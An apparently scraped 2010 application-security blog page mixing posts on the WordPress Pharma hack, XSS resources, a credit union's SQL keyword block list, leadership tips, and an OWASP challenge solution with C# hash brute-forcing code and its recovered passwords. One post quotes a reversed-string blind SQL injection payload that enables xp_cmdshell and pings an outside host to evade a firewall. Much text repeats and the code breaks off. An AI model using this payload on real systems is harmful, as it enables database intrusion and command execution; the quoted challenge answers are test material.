If you want to become a Certified Application Security Specialist, here is a way to become one:
http://www.asscert.com/
If you do not want to spend money and still want to get PCI compliance, here is the way:
http://www.scanlesspci.com/
Saturday, August 28, 2010
Thursday, July 15, 2010
Understanding and cleaning the Pharma hack on WordPress
Understanding and cleaning the Pharma hack on WordPress --
The Pharma Hack has various moving parts:
1 – Backdoor that allows the attackers to insert files and modify the database.
2 – Backdoor inside one (or more) plugins to insert the spam.
3 – Backdoor inside the database used by the plugins.
After decoded, this is the content of the backdoor: http://sucuri.net/?page=tools&title=blacklist&detail=3ec33c4ab82d2db3e26871d5a11fb759
If you are infected, you will see things like (full content of the file here):
The Pharma Hack has various moving parts:
1 – Backdoor that allows the attackers to insert files and modify the database.
2 – Backdoor inside one (or more) plugins to insert the spam.
3 – Backdoor inside the database used by the plugins.
After decoded, this is the content of the backdoor: http://sucuri.net/?page=tools&title=blacklist&detail=3ec33c4ab82d2db3e26871d5a11fb759
If you are infected, you will see things like (full content of the file here):
Sunday, July 11, 2010
Thursday, July 8, 2010
Firefox Addons for Web Application Security Penetration Testing
FireFox Addons for Web Application Security Penetration Testing
https://addons.mozilla.org/en-US/firefox/collection/webappsec
Wednesday, May 19, 2010
Advice for information security professioals
http://preachsecurity.blogspot.com/2010/04/infosec-career-advice.html
has some valid suggestions for information security professional
"If you want to contribute meaningfully to the Information Security field - go do something else first... business analyst risk analyst project manager, developer...anything! Learn how the business works, learn what keeps you employed - learn how your company and business makes money."
You probably already get the technology - but can you tell me how it applies to what the business does?"
Yes. Technology can only be embraced by business if it can either save money or make money. No matter how smart you are or how technical savvy you are, you need to convince business to buy in security.
has some valid suggestions for information security professional
"If you want to contribute meaningfully to the Information Security field - go do something else first... business analyst risk analyst project manager, developer...anything! Learn how the business works, learn what keeps you employed - learn how your company and business makes money."
You probably already get the technology - but can you tell me how it applies to what the business does?"
Yes. Technology can only be embraced by business if it can either save money or make money. No matter how smart you are or how technical savvy you are, you need to convince business to buy in security.
The funny way to prevent SQL injection
The funny way to prevent SQL injection from Sacramento Credit Union:
Why are the Security Questions used?
The first time you login and enroll in Protection Plus, you will be asked to enter five Security Questions and corresponding answers. The Security Questions are used if you do not want to register the computer you are currently using. With the Security Questions, we can make sure it is you logging in when you use different computers, such as, a internet bar computer.
The answers to your Security Questions are case sensitive and cannot contain special characters like an apostrophe, or the words “insert,” “delete,” “drop,” “update,” “null,” or “select.”
Why can’t I use certain words like "drop" as part of my Security Question answers? There are certain words used by hackers to try to gain access to systems and manipulate data; therefore, the following words are restricted: "select," "delete," "update," "insert," "drop" and "null".
Google cache can be found at http://webcache.googleusercontent.com/search?q=cache%3A6LhOOjbpBVEJ%3Ahttps%3A%2F%2Fhomebank.sactocu.org%2FUA2004%2Ffaq-mfa.htm%2Bsactocu%2Bdrop%2Bselect&cd=1&hl=de&ct=clnk&client=ubuntu
They must forget to add shutdown, alter into the list.
Why are the Security Questions used?
The first time you login and enroll in Protection Plus, you will be asked to enter five Security Questions and corresponding answers. The Security Questions are used if you do not want to register the computer you are currently using. With the Security Questions, we can make sure it is you logging in when you use different computers, such as, a internet bar computer.
The answers to your Security Questions are case sensitive and cannot contain special characters like an apostrophe, or the words “insert,” “delete,” “drop,” “update,” “null,” or “select.”
Why can’t I use certain words like "drop" as part of my Security Question answers? There are certain words used by hackers to try to gain access to systems and manipulate data; therefore, the following words are restricted: "select," "delete," "update," "insert," "drop" and "null".
Google cache can be found at http://webcache.googleusercontent.com/search?q=cache%3A6LhOOjbpBVEJ%3Ahttps%3A%2F%2Fhomebank.sactocu.org%2FUA2004%2Ffaq-mfa.htm%2Bsactocu%2Bdrop%2Bselect&cd=1&hl=de&ct=clnk&client=ubuntu
They must forget to add shutdown, alter into the list.
Some links for XSS
Cross-Site Scripting (XSS) from OWASP
http://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
XSS Prevention Cheat Sheet from OWASP
http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
Download link for Anti-XSS library V3.1
http://www.microsoft.com/downloads/details.aspx?FamilyId=051ee83c-5ccf-48ed-8463-02f56a6bfc09&displaylang=en
It comes with Sample code and Help file.
Additional resources about Anti-XSS library
Some FAQ questions about Anti-XSS library:
http://msdn.microsoft.com/en-us/security/aa973814.aspx
HTML Sanitization in Anti-XSS Library:
http://blogs.msdn.com/securitytools/archive/2009/09/01/html-sanitization-in-anti-xss-library.aspx
Difference between Anti-XSS library and HttpUtility.HtmlEncode
http://blogs.msdn.com/securitytools/archive/2009/07/09/differences-between-antixss-htmlencode-and-httputility-htmlencode-methods.aspx
The list of controls which automatically encode:
http://blogs.msdn.com/cisg/archive/2008/09/17/which-asp-net-controls-need-html-encoding.aspx.
http://blogs.msdn.com/sfaust/attachment/8918996.ashx
http://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
XSS Prevention Cheat Sheet from OWASP
http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
Download link for Anti-XSS library V3.1
http://www.microsoft.com/downloads/details.aspx?FamilyId=051ee83c-5ccf-48ed-8463-02f56a6bfc09&displaylang=en
It comes with Sample code and Help file.
Additional resources about Anti-XSS library
Some FAQ questions about Anti-XSS library:
http://msdn.microsoft.com/en-us/security/aa973814.aspx
HTML Sanitization in Anti-XSS Library:
http://blogs.msdn.com/securitytools/archive/2009/09/01/html-sanitization-in-anti-xss-library.aspx
Difference between Anti-XSS library and HttpUtility.HtmlEncode
http://blogs.msdn.com/securitytools/archive/2009/07/09/differences-between-antixss-htmlencode-and-httputility-htmlencode-methods.aspx
The list of controls which automatically encode:
http://blogs.msdn.com/cisg/archive/2008/09/17/which-asp-net-controls-need-html-encoding.aspx.
http://blogs.msdn.com/sfaust/attachment/8918996.ashx
Monday, May 17, 2010
An interesting blog about reverse blind SQL injection
An interesting blog about reverse blind SQL injection
The application is subject to Blind SQL injection and the company is deploying both web application firewalls and network intrusion Prevention System. It seems that the web application firewall does an excellent job at staying current with the latest methods for bypassing Web Application Firewall technologies.
However, the backward attack is working. Most SQL databases support a reverse function. Here is the attack
var=1';DECLARE @a varchar(200) DECLARE @b varchar(200) DECLARE @c varchar(200) SET @a = REVERSE ('1 ,"snoitpo decnavda wohs" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @b = REVERSE ('1,"llehsdmc_px" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @c =REVERSE('"moc.dragarten gnip" llehsdmc_px') EXEC (@c);--
http://snosoft.blogspot.com/2010/05/reversenoitcejni-lqs-dnilb-bank-hacking.html
The application is subject to Blind SQL injection and the company is deploying both web application firewalls and network intrusion Prevention System. It seems that the web application firewall does an excellent job at staying current with the latest methods for bypassing Web Application Firewall technologies.
However, the backward attack is working. Most SQL databases support a reverse function. Here is the attack
var=1';DECLARE @a varchar(200) DECLARE @b varchar(200) DECLARE @c varchar(200) SET @a = REVERSE ('1 ,"snoitpo decnavda wohs" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @b = REVERSE ('1,"llehsdmc_px" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @c =REVERSE('"moc.dragarten gnip" llehsdmc_px') EXEC (@c);--
http://snosoft.blogspot.com/2010/05/reversenoitcejni-lqs-dnilb-bank-hacking.html
Thursday, May 13, 2010
How to become a good leader?
From http://www.scouting.org/scoutsource/BoyScouts/PatrolLeader/s8.aspx
It is amazing that how simple and truthful these tips are:
It is amazing that how simple and truthful these tips are:
- Keep your Word. Don't make promises you can't keep.
- Be Fair to All. A good leader shows no favorites. Don't allow friendships to keep you from being fair to all members of your patrol. Know who likes to what, and assign duties to patrol members by what they like to do.
- Be a Good Communicator. Yo don't need a commanding voice to be a good leader, but you must be willing to step out front with an effective "let's go." A good leader knows how to get and give information so that everyone understands what's going on.
- Be Flexible. Everything does not always go as planned. Be prepared to shift to "plan B" when "plan A" does not work.
- Be organized. The time you spend planing will be repaid many times over. At patrol meetings, record who agrees to do each task, and fill out the duty roster before going camping.
- Delegate. Some leaders assume that the job will not get done unless they do it themselves. Most people like to be challenged with a task. Empower your patrol members to do things they have never tried.
- Set an Example. The most important thing you can do is lead by example. Whatever you do, your patrol members are likely to do the same. A cheerful attitude can keep everyone's spirits up.
- Be Consistent. Nothing is more confusing than a leader who is one way one moment and another way a short time later. If your patrol knows what to expect from you, they will more likely respond positively to your leadership.
- Give Praise. The best way to get credit is to give it away. Often a "Nice job" is all the praise necessary to make a Scout feel he is contributing to the efforts of the patrol.
- Ask for Help. Don't be embarrassed to ask for help. You have many resources at your disposal. When confronted with a situation you don't know how to handle, ask someone with more experience for some advice and direction.
Tuesday, March 9, 2010
Reflection over "How to implement effective security" of Dr.Cole
Dr.Cole's presentation is great. His approaches sound reasonable and practical. Here is his ways to implement effective security:
1) Fully understand your assets. As a security professionals, we should know what we are protecting. Although this seems to be an obvious question, it is a very difficult. Ask yourself this question "what's most important data within my organization? What are five most important business processes dealing with the data?"
2) Reduce the number of vulnerabilities of the systems. The threats are mutating every minute, it is so difficult to catch with bad guys. It is more worthwhile to spend time and efforts reducing attack surface. His idea of "airline security models" is great. It is almost impossible to protect thousands of different machines within one organization. However, the task is easier if the number of different machines is reduced to less than ten. Coupled with strict change management process, we can make the task really manageable.
3)Pay more attention to insider attack. The statistics show that the number of insider attacks almost equal the number of outside attacks. However, only 20% of money and efforts are spent on defense against insider attacks. There are general two types of insider attackers: malicious insiders and unintentional attackers. Malicious insiders intend to harm your organization driven by different factors such as money, revenge, etc. Unintentional attackers are victims who helped bad guys without even knowing what's going on. It might be an employee who clicked a malicious link of within a spear phishing email. Or it might be a help desk technician who happily assist a "so-called" manager on vacation to reset his/her password so that he/she can get some urgent tasks finished. Or, it might be just a customer service representative who is helping his customer using an vulnerable Intranet application which read malicious payload dropped by bad guys. The list goes on and on. The castle can be easily broken down from inside. However, people seem to be reluctant to trust insiders more since we are working for the same company. This is fine. In fact, most organization encourage employee socialization to boost productivity. However, we should also educate the employees about the insider risks and deploy defenses.
4) Correlation, correlation and correlation. The attacks are become more sophisticated as the systems are evolving too. How to detect multiple stage attack? How to detect encrypted payload? The solution is "correlation". Individual events might not be so interesting. But they might suggest something really bad is happening if correlated together. Here is Dr. Cole's example:
- download some content from a unsafe website
- Untrusted programs runs
- Something is changing registry and system files
- the machine talks to strange outside servers
- huge amount of data is transferred outside
5) Pay more attention to outbound traffic. The goal of the attacker is "making money". They want your sensitive data or finding other ways to make money for themselves. Stealing your data is one of most common ways to get them rich. The impact is more serious than denial of service attacks. The data needs to be transferred out of your organization. Pay attention to those outbound connections:
- Connection using IP address or dynamic DNS
- Long live connection
- connection with large amount of traffic
6) Detection is key.
7) Automation is must.
Tuesday, February 23, 2010
AppSec Challenge 9's solution
Ok, the first one is easy and pwd1=OWASP. Next, it is turn to brute force md2, md4 and md5. Unfortunately, C# does not support md2 and md4 due to its security issue. However, a quick Google search find bouncycastle,
http://www.bouncycastle.org/csharp/.
After downloding their library, now it is time to brute force all the hashes one by one.
1) md2, this one is fast:
16189F5462BF906E9D88CF6F152DE86F
Found a Match
password is:GnuOWASP
hash is: 16189F5462BF906E9D88CF6F152DE86F
so, pwd2=Gnu
2) md4, this one is fast too:
FA8F46A6D347087D6980C3FA77DD4DE9
Found a Match
password is:lOOpGnu
hash is: FA8F46A6D347087D6980C3FA77DD4DE9
so, pwd3 = lOOp
3) md5, this one is fast too:
Found a Match
password is:SthlmlOOp
hash is: 425B33D6F60394C897B8413B5C185845
so, pwd4 = Sthlm
4) RIPEMD160, I use System.Security.Cryptography.RIPEMD160. It is fast
35F34671D30472D403937820DCABC1C78C837071
Found a Match
password is:klueSthlm
hash is: 35F34671D30472D403937820DCABC1C78C837071
so pwd5 =klue
5)SHA1, I use System.Security.Cryptography.SHA1 and it is fast:
AE81A30510B2931921934218636B26A803330EB1
Found a Match
password is:ZaQxklue
hash is: AE81A30510B2931921934218636B26A803330EB1
so pwd6 = ZaQx
6) sha256, SHA256 within System.Security.Cryptography is ready to use. This one does take some more than 10 minutes.
B2FF0269E927C6559804A37590A0688C45DF143F85CEE0E3F239F846B65C9644
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37
Found a Match
password is:pryLZaQx
hash is: B2FF0269E927C6559804A37590A0688C45DF143F85CEE0E3F239F846B65C9644
pwd7 = pryL
7) GOST3411, bouncycastle already implemented it. And it only took about 10 minutes.
0 0 1 2 3 4 5 6 7 8 9 10 11 12 13
Found a Match
password is:winnapryL
hash is: 16CC9F1FF65688E040F5ADA82A41A258FF948769CDA4C4A17D85228A6F358971
pwd8 = winna
In summary, it is pretty easy to brute force these hashes due to limit length (maximum lenght is five) and not so large character set (52 alpha characters). That's another reason why we should enforce password complexity rules.
The following is the code used to crack these hashes. They are not neat.
http://www.bouncycastle.org/csharp/.
After downloding their library, now it is time to brute force all the hashes one by one.
1) md2, this one is fast:
16189F5462BF906E9D88CF6F152DE86F
Found a Match
password is:GnuOWASP
hash is: 16189F5462BF906E9D88CF6F152DE86F
so, pwd2=Gnu
2) md4, this one is fast too:
FA8F46A6D347087D6980C3FA77DD4DE9
Found a Match
password is:lOOpGnu
hash is: FA8F46A6D347087D6980C3FA77DD4DE9
so, pwd3 = lOOp
3) md5, this one is fast too:
Found a Match
password is:SthlmlOOp
hash is: 425B33D6F60394C897B8413B5C185845
so, pwd4 = Sthlm
4) RIPEMD160, I use System.Security.Cryptography.RIPEMD160. It is fast
35F34671D30472D403937820DCABC1C78C837071
Found a Match
password is:klueSthlm
hash is: 35F34671D30472D403937820DCABC1C78C837071
so pwd5 =klue
5)SHA1, I use System.Security.Cryptography.SHA1 and it is fast:
AE81A30510B2931921934218636B26A803330EB1
Found a Match
password is:ZaQxklue
hash is: AE81A30510B2931921934218636B26A803330EB1
so pwd6 = ZaQx
6) sha256, SHA256 within System.Security.Cryptography is ready to use. This one does take some more than 10 minutes.
B2FF0269E927C6559804A37590A0688C45DF143F85CEE0E3F239F846B65C9644
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37
Found a Match
password is:pryLZaQx
hash is: B2FF0269E927C6559804A37590A0688C45DF143F85CEE0E3F239F846B65C9644
pwd7 = pryL
7) GOST3411, bouncycastle already implemented it. And it only took about 10 minutes.
0 0 1 2 3 4 5 6 7 8 9 10 11 12 13
Found a Match
password is:winnapryL
hash is: 16CC9F1FF65688E040F5ADA82A41A258FF948769CDA4C4A17D85228A6F358971
pwd8 = winna
In summary, it is pretty easy to brute force these hashes due to limit length (maximum lenght is five) and not so large character set (52 alpha characters). That's another reason why we should enforce password complexity rules.
The following is the code used to crack these hashes. They are not neat.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Security.Cryptography;
using Org.BouncyCastle.Crypto.Digests;
namespace hashCrack
{
class Program
{
static String md2Hash(String clearText)
{
MD2Digest md2 = new MD2Digest();
byte[] strBytes = Encoding.Default.GetBytes(clearText);
md2.BlockUpdate(strBytes, 0, strBytes.Length);
byte[] hash = new byte[16];
md2.DoFinal(hash, 0);
StringBuilder sBuilder = new StringBuilder();
for (int i = 0; i < hash.Length; i++)
{
sBuilder.Append(hash[i].ToString("x2"));
}
return sBuilder.ToString().ToUpper();
}
static String md4Hash(String clearText)
{
MD4Digest md4 = new MD4Digest();
byte[] strBytes = Encoding.Default.GetBytes(clearText);
md4.BlockUpdate(strBytes, 0, strBytes.Length);
byte[] hash = new byte[16];
md4.DoFinal(hash, 0);
StringBuilder sBuilder = new StringBuilder();
for (int i = 0; i < hash.Length; i++)
{
sBuilder.Append(hash[i].ToString("x2"));
}
return sBuilder.ToString().ToUpper();
}
static String md5Hash(String clearText)
{
MD5Digest md5 = new MD5Digest();
byte[] strBytes = Encoding.Default.GetBytes(clearText);
md5.BlockUpdate(strBytes, 0, strBytes.Length);
byte[] hash = new byte[16];
md5.DoFinal(hash, 0);
StringBuilder sBuilder = new StringBuilder();
for (int i = 0; i < hash.Length; i++)
{
sBuilder.Append(hash[i].ToString("x2"));
}
return sBuilder.ToString().ToUpper();
}
static String gost3411Hash(String clearText)
{
Gost3411Digest gost = new Gost3411Digest();
byte[] strBytes = Encoding.Default.GetBytes(clearText);
gost.BlockUpdate(strBytes, 0, strBytes.Length);
byte[] hash = new byte[32];
gost.DoFinal(hash, 0);
StringBuilder sBuilder = new StringBuilder();
for (int i = 0; i < hash.Length; i++)
{
sBuilder.Append(hash[i].ToString("x2"));
}
return sBuilder.ToString().ToUpper();
}
static String ripemd160Hash(String clearText)
{
RIPEMD160 myRIPE = RIPEMD160Managed.Create();
byte[] strBytes = Encoding.Default.GetBytes(clearText);
byte[] hash = myRIPE.ComputeHash(strBytes);
StringBuilder sBuilder = new StringBuilder();
for (int i = 0; i < hash.Length; i++)
{
sBuilder.Append(hash[i].ToString("x2"));
}
return sBuilder.ToString().ToUpper();
}
static String sha1Hash(String clearText)
{
byte[] strBytes = Encoding.Default.GetBytes(clearText);
SHA1 sha = new SHA1CryptoServiceProvider();
byte[] hash = sha.ComputeHash(strBytes);
StringBuilder sBuilder = new StringBuilder();
for (int i = 0; i < hash.Length; i++)
{
sBuilder.Append(hash[i].ToString("x2"));
}
return sBuilder.ToString().ToUpper();
}
static String sha256Hash(String clearText)
{
byte[] strBytes = Encoding.Default.GetBytes(clearText);
SHA256 shaM = new SHA256Managed();
byte[] hash = shaM.ComputeHash(strBytes);
StringBuilder sBuilder = new StringBuilder();
for (int i = 0; i < hash.Length; i++)
{
sBuilder.Append(hash[i].ToString("x2"));
}
return sBuilder.ToString().ToUpper();
}
static void crackRipe()
{
String pwd4 = "Sthlm";
String targetHash = "35F34671D30472D403937820DCABC1C78C837071";
Console.WriteLine(targetHash);
String elements = "abcdefghijklmnopqrstuvwxyz";
elements = elements + elements.ToUpper();
//for (int n = 0; n < elements.Length; n++)
//{
//Console.WriteLine(" " + n);
for (int m = 0; m < elements.Length; m++)
{
for (int k = 0; k < elements.Length; k++)
{
for (int j = 0; j < elements.Length; j++)
{
for (int i = 0; i < elements.Length; i++)
{
// String strTest = elements.Substring(i, 1) + elements.Substring(j, 1) + elements.Substring(k, 1) + elements.Substring(m, 1) + elements.Substring(n, 1) + pwd4;
String strTest = elements.Substring(i, 1) + elements.Substring(j, 1) + elements.Substring(k, 1) + elements.Substring(m, 1) + pwd4;
String hash = ripemd160Hash(strTest);
//Console.WriteLine(" " + strTest);
//Console.WriteLine(" " + hash);
if (hash.Equals(targetHash))
{
Console.WriteLine("Found a Match");
Console.WriteLine("password is:" + strTest);
Console.WriteLine("hash is: " + hash);
}
}
}
}
}
//}
//pwd5 = "klue";
//AE81A30510B2931921934218636B26A803330EB1
}
static void crackSha1()
{
String pwd5 = "klue";
String targetHash = "AE81A30510B2931921934218636B26A803330EB1";
Console.WriteLine(targetHash);
String elements = "abcdefghijklmnopqrstuvwxyz";
elements = elements + elements.ToUpper();
//for (int n = 0; n < elements.Length; n++)
//{
//Console.WriteLine(" " + n);
for (int m = 0; m < elements.Length; m++)
{
for (int k = 0; k < elements.Length; k++)
{
for (int j = 0; j < elements.Length; j++)
{
for (int i = 0; i < elements.Length; i++)
{
// String strTest = elements.Substring(i, 1) + elements.Substring(j, 1) + elements.Substring(k, 1) + elements.Substring(m, 1) + elements.Substring(n, 1) + pwd4;
String strTest = elements.Substring(i, 1) + elements.Substring(j, 1) + elements.Substring(k, 1) + elements.Substring(m, 1) + pwd5;
String hash = sha1Hash(strTest);
//Console.WriteLine(" " + strTest);
//Console.WriteLine(" " + hash);
if (hash.Equals(targetHash))
{
Console.WriteLine("Found a Match");
Console.WriteLine("password is:" + strTest);
Console.WriteLine("hash is: " + hash);
}
}
}
}
}
//}
//pwd5 = "klue";
//
}
static void crackSha256()
{
String pwd6 = "ZaQx";
String targetHash = "B2FF0269E927C6559804A37590A0688C45DF143F85CEE0E3F239F846B65C9644";
Console.WriteLine(targetHash);
String elements = "abcdefghijklmnopqrstuvwxyz";
elements = elements + elements.ToUpper();
//for (int n = 0; n < elements.Length; n++)
//{
//Console.WriteLine(" " + n);
for (int m = 0; m < elements.Length; m++)
{
Console.WriteLine(" " + m);
for (int k = 0; k < elements.Length; k++)
{
for (int j = 0; j < elements.Length; j++)
{
for (int i = 0; i < elements.Length; i++)
{
// String strTest = elements.Substring(i, 1) + elements.Substring(j, 1) + elements.Substring(k, 1) + elements.Substring(m, 1) + elements.Substring(n, 1) + pwd4;
String strTest = elements.Substring(i, 1) + elements.Substring(j, 1) + elements.Substring(k, 1) + elements.Substring(m, 1) + pwd6;
String hash = sha256Hash(strTest);
//Console.WriteLine(" " + strTest);
//Console.WriteLine(" " + hash);
if (hash.Equals(targetHash))
{
Console.WriteLine("Found a Match");
Console.WriteLine("password is:" + strTest);
Console.WriteLine("hash is: " + hash);
}
}
}
}
}
//}
}
static void crackGOST3411()
{
String pwd7 = "pryL";
String targetHash = "16CC9F1FF65688E040F5ADA82A41A258FF948769CDA4C4A17D85228A6F358971";
Console.WriteLine(targetHash);
String elements = "abcdefghijklmnopqrstuvwxyz";
elements = elements + elements.ToUpper();
for (int n = 0; n < elements.Length; n++)
{
Console.WriteLine(" " + n);
for (int m = 0; m < elements.Length; m++)
{
Console.Write(" " + m);
for (int k = 0; k < elements.Length; k++)
{
for (int j = 0; j < elements.Length; j++)
{
for (int i = 0; i < elements.Length; i++)
{
String strTest = elements.Substring(i, 1) + elements.Substring(j, 1) + elements.Substring(k, 1) + elements.Substring(m, 1) + elements.Substring(n, 1) + pwd7;
//String strTest = elements.Substring(i, 1) + elements.Substring(j, 1) + elements.Substring(k, 1) + elements.Substring(m, 1) + pwd7;
String hash = gost3411Hash(strTest);
//Console.WriteLine(" " + strTest);
//Console.WriteLine(" " + hash);
if (hash.Equals(targetHash))
{
Console.WriteLine("Found a Match");
Console.WriteLine("password is:" + strTest);
Console.WriteLine("hash is: " + hash);
}
}
}
}
}
}
}
//
static void Main(string[] args)
{
//String pwd1 = "OWASP";
//String pwd2 = "Gnu";
String pwd3 = "lOOp";
//String targetHash = "FA8F46A6D347087D6980C3FA77DD4DE9";
//crackRipe();
//crackSha1();
//crackSha256();
crackGOST3411();
}
}
}
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Security.Cryptography;
using Org.BouncyCastle.Crypto.Digests;
namespace hashCrack
{
class Program
{
static String md2Hash(String clearText)
{
MD2Digest md2 = new MD2Digest();
byte[] strBytes = Encoding.Default.GetBytes(clearText);
md2.BlockUpdate(strBytes, 0, strBytes.Length);
byte[] hash = new byte[16];
md2.DoFinal(hash, 0);
StringBuilder sBuilder = new StringBuilder();
for (int i = 0; i < hash.Length; i++)
{
sBuilder.Append(hash[i].ToString("x2"));
}
return sBuilder.ToString().ToUpper();
}
static String md4Hash(String clearText)
{
MD4Digest md4 = new MD4Digest();
byte[] strBytes = Encoding.Default.GetBytes(clearText);
md4.BlockUpdate(strBytes, 0, strBytes.Length);
byte[] hash = new byte[16];
md4.DoFinal(hash, 0);
StringBuilder sBuilder = new StringBuilder();
for (int i = 0; i < hash.Length; i++)
{
sBuilder.Append(hash[i].ToString("x2"));
}
return sBuilder.ToString().ToUpper();
}
static String md5Hash(String clearText)
{
MD5Digest md5 = new MD5Digest();
byte[] strBytes = Encoding.Default.GetBytes(clearText);
md5.BlockUpdate(strBytes, 0, strBytes.Length);
byte[] hash = new byte[16];
md5.DoFinal(hash, 0);
StringBuilder sBuilder = new StringBuilder();
for (int i = 0; i < hash.Length; i++)
{
sBuilder.Append(hash[i].ToString("x2"));
}
return sBuilder.ToString().ToUpper();
}
static String gost3411Hash(String clearText)
{
Gost3411Digest gost = new Gost3411Digest();
byte[] strBytes = Encoding.Default.GetBytes(clearText);
gost.BlockUpdate(strBytes, 0, strBytes.Length);
byte[] hash = new byte[32];
gost.DoFinal(hash, 0);
StringBuilder sBuilder = new StringBuilder();
for (int i = 0; i < hash.Length; i++)
{
sBuilder.Append(hash[i].ToString("x2"));
}
return sBuilder.ToString().ToUpper();
}
static String ripemd160Hash(String clearText)
{
RIPEMD160 myRIPE = RIPEMD160Managed.Create();
byte[] strBytes = Encoding.Default.GetBytes(clearText);
byte[] hash = myRIPE.ComputeHash(strBytes);
StringBuilder sBuilder = new StringBuilder();
for (int i = 0; i < hash.Length; i++)
{
sBuilder.Append(hash[i].ToString("x2"));
}
return sBuilder.ToString().ToUpper();
}
static String sha1Hash(String clearText)
{
byte[] strBytes = Encoding.Default.GetBytes(clearText);
SHA1 sha = new SHA1CryptoServiceProvider();
byte[] hash = sha.ComputeHash(strBytes);
StringBuilder sBuilder = new StringBuilder();
for (int i = 0; i < hash.Length; i++)
{
sBuilder.Append(hash[i].ToString("x2"));
}
return sBuilder.ToString().ToUpper();
}
static String sha256Hash(String clearText)
{
byte[] strBytes = Encoding.Default.GetBytes(clearText);
SHA256 shaM = new SHA256Managed();
byte[] hash = shaM.ComputeHash(strBytes);
StringBuilder sBuilder = new StringBuilder();
for (int i = 0; i < hash.Length; i++)
{
sBuilder.Append(hash[i].ToString("x2"));
}
return sBuilder.ToString().ToUpper();
}
static void crackRipe()
{
String pwd4 = "Sthlm";
String targetHash = "35F34671D30472D403937820DCABC1C78C837071";
Console.WriteLine(targetHash);
String elements = "abcdefghijklmnopqrstuvwxyz";
elements = elements + elements.ToUpper();
//for (int n = 0; n < elements.Length; n++)
//{
//Console.WriteLine(" " + n);
for (int m = 0; m < elements.Length; m++)
{
for (int k = 0; k < elements.Length; k++)
{
for (int j = 0; j < elements.Length; j++)
{
for (int i = 0; i < elements.Length; i++)
{
// String strTest = elements.Substring(i, 1) + elements.Substring(j, 1) + elements.Substring(k, 1) + elements.Substring(m, 1) + elements.Substring(n, 1) + pwd4;
String strTest = elements.Substring(i, 1) + elements.Substring(j, 1) + elements.Substring(k, 1) + elements.Substring(m, 1) + pwd4;
String hash = ripemd160Hash(strTest);
//Console.WriteLine(" " + strTest);
//Console.WriteLine(" " + hash);
if (hash.Equals(targetHash))
{
Console.WriteLine("Found a Match");
Console.WriteLine("password is:" + strTest);
Console.WriteLine("hash is: " + hash);
}
}
}
}
}
//}
//pwd5 = "klue";
//AE81A30510B2931921934218636B26A803330EB1
}
static void crackSha1()
{
String pwd5 = "klue";
String targetHash = "AE81A30510B2931921934218636B26A803330EB1";
Console.WriteLine(targetHash);
String elements = "abcdefghijklmnopqrstuvwxyz";
elements = elements + elements.ToUpper();
//for (int n = 0; n < elements.Length; n++)
//{
//Console.WriteLine(" " + n);
for (int m = 0; m < elements.Length; m++)
{
for (int k = 0; k < elements.Length; k++)
{
for (int j = 0; j < elements.Length; j++)
{
for (int i = 0; i < elements.Length; i++)
{
// String strTest = elements.Substring(i, 1) + elements.Substring(j, 1) + elements.Substring(k, 1) + elements.Substring(m, 1) + elements.Substring(n, 1) + pwd4;
String strTest = elements.Substring(i, 1) + elements.Substring(j, 1) + elements.Substring(k, 1) + elements.Substring(m, 1) + pwd5;
String hash = sha1Hash(strTest);
//Console.WriteLine(" " + strTest);
//Console.WriteLine(" " + hash);
if (hash.Equals(targetHash))
{
Console.WriteLine("Found a Match");
Console.WriteLine("password is:" + strTest);
Console.WriteLine("hash is: " + hash);
}
}
}
}
}
//}
//pwd5 = "klue";
//
}
static void crackSha256()
{
String pwd6 = "ZaQx";
String targetHash = "B2FF0269E927C6559804A37590A0688C45DF143F85CEE0E3F239F846B65C9644";
Console.WriteLine(targetHash);
String elements = "abcdefghijklmnopqrstuvwxyz";
elements = elements + elements.ToUpper();
//for (int n = 0; n < elements.Length; n++)
//{
//Console.WriteLine(" " + n);
for (int m = 0; m < elements.Length; m++)
{
Console.WriteLine(" " + m);
for (int k = 0; k < elements.Length; k++)
{
for (int j = 0; j < elements.Length; j++)
{
for (int i = 0; i < elements.Length; i++)
{
// String strTest = elements.Substring(i, 1) + elements.Substring(j, 1) + elements.Substring(k, 1) + elements.Substring(m, 1) + elements.Substring(n, 1) + pwd4;
String strTest = elements.Substring(i, 1) + elements.Substring(j, 1) + elements.Substring(k, 1) + elements.Substring(m, 1) + pwd6;
String hash = sha256Hash(strTest);
//Console.WriteLine(" " + strTest);
//Console.WriteLine(" " + hash);
if (hash.Equals(targetHash))
{
Console.WriteLine("Found a Match");
Console.WriteLine("password is:" + strTest);
Console.WriteLine("hash is: " + hash);
}
}
}
}
}
//}
}
static void crackGOST3411()
{
String pwd7 = "pryL";
String targetHash = "16CC9F1FF65688E040F5ADA82A41A258FF948769CDA4C4A17D85228A6F358971";
Console.WriteLine(targetHash);
String elements = "abcdefghijklmnopqrstuvwxyz";
elements = elements + elements.ToUpper();
for (int n = 0; n < elements.Length; n++)
{
Console.WriteLine(" " + n);
for (int m = 0; m < elements.Length; m++)
{
Console.Write(" " + m);
for (int k = 0; k < elements.Length; k++)
{
for (int j = 0; j < elements.Length; j++)
{
for (int i = 0; i < elements.Length; i++)
{
String strTest = elements.Substring(i, 1) + elements.Substring(j, 1) + elements.Substring(k, 1) + elements.Substring(m, 1) + elements.Substring(n, 1) + pwd7;
//String strTest = elements.Substring(i, 1) + elements.Substring(j, 1) + elements.Substring(k, 1) + elements.Substring(m, 1) + pwd7;
String hash = gost3411Hash(strTest);
//Console.WriteLine(" " + strTest);
//Console.WriteLine(" " + hash);
if (hash.Equals(targetHash))
{
Console.WriteLine("Found a Match");
Console.WriteLine("password is:" + strTest);
Console.WriteLine("hash is: " + hash);
}
}
}
}
}
}
}
//
static void Main(string[] args)
{
//String pwd1 = "OWASP";
//String pwd2 = "Gnu";
String pwd3 = "lOOp";
